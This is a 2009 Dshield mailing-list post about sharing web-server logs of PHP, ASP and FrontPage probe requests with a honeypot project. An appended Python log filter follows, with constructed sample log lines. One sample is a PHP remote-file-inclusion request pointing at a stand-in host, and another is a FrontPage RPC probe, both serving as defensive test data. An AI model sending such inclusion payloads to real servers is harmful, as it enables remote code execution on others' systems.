[Dshield] Web honeypot project
John Hardin
jhardin at impsec.org
Wed Feb 18 18:33:56 GMT 2009
On Tue, 17 Feb 2009, John Hardin wrote:
> On Tue, 17 Feb 2009, John Hardin wrote:
>
>> On Tue, 17 Feb 2009, Johannes B. Ullrich wrote:
>>
>>> If you filter too tightly, then you will only send us a biased view of
>>> the attacks you see. For example, I consider a script one of our
>>> handlers (Robert Danford) wrote which collects PHP file inclusion
>>> attempts. It works very well to identify malware URLs spreading via file
>>> inclusion, but it totally misses other attacks.
>>
>> There's a limit to the resources I can devote to a featureful honeypot,
>> and I don't run PHP on my production web server. What I was thinking was
>> shipping logs of any request for any .php file from my production server.
>> That I can do quite easily. Is that too filtered to be useful?
>
> ...and, of course, requests for any FrontPage cruft, or ASP, or ASP.NET,
> or any of the other SSI stuff I don't support.
Johannes, do you want Apache logs for this stuff?
--
John Hardin KA7OHZ http://www.impsec.org/~jhardin/
jhardin at impsec.org FALaholic #11174 pgpk -a jhardin at impsec.org
key: 0xB8732E79 -- 2D8C 34F4 6411 F507 136C AF76 D822 E6E6 B873 2E79
-----------------------------------------------------------------------
Look at the people at the top of both efforts. Linus Torvalds is a
university graduate with a CS degree. Bill Gates is a university
dropout who bragged about dumpster-diving and using other peoples'
garbage code as the basis for his code. Maybe that has something to
do with the difference in quality/security between Linux and
Windows. -- anytwofiveelevenis on Y! SCOX
-----------------------------------------------------------------------
4 days until George Washington's 277th Birthday
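
The selection discussed in this thread (forwarding only requests for technologies the server does not run), as an added example that is not part of the original messages. It assumes Apache common/combined log lines; the category patterns, function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache common/combined prefix: host ident user [time] "request" status size
# The request field may contain backslash-escaped quotes.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" \d{3} \S+'
)

# Assumed categories for a server that runs none of these technologies.
CATEGORIES = [
    ("php", re.compile(r"\.php\d?(?:/|$)", re.I)),
    ("asp", re.compile(r"\.(?:asp|aspx|asmx|ashx)(?:/|$)", re.I)),
    ("frontpage", re.compile(r"/_vti_", re.I)),
]

SAMPLE_LOG = [  # constructed lines, not real traffic
    '192.0.2.10 - - [17/Feb/2009:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Feb/2009:10:00:05 +0000] "GET /index.php?page=http://example.invalid/x.txt? HTTP/1.1" 404 209',
    '203.0.113.4 - - [17/Feb/2009:10:01:12 +0000] "POST /_vti_bin/shtml.exe/_vti_rpc HTTP/1.1" 404 215',
    '203.0.113.9 - - [17/Feb/2009:10:02:40 +0000] "GET /admin/Login%2Easpx HTTP/1.0" 404 210',
    '192.0.2.33 - - [17/Feb/2009:10:03:02 +0000] "GET /docs/page.html?ref=old.php HTTP/1.1" 200 812',
    '192.0.2.50 - - [17/Feb/2009:10:04:00 +0000] "-" 408 -',
]

def classify(line):
    """Return (host, time, request, category), or None if the line is not of interest."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = m.group("request").split()
    if len(parts) < 2:
        return None  # malformed or empty request line
    # Match on the decoded path only, so ".php" inside a query string
    # on a static page does not count and "%2E" cannot hide an extension.
    path = unquote(parts[1].split("?", 1)[0])
    for name, pattern in CATEGORIES:
        if pattern.search(path):
            return (m.group("host"), m.group("time"), m.group("request"), name)
    return None

def select(lines):
    """Keep only the log lines that fall into one of the categories."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for host, when, request, category in select(SAMPLE_LOG):
        print(f"{category}\t{host}\t{when}\t{request}")
```

Everything outside the three categories is dropped, which is the bias Johannes describes: the output shows probes for these technologies and nothing else.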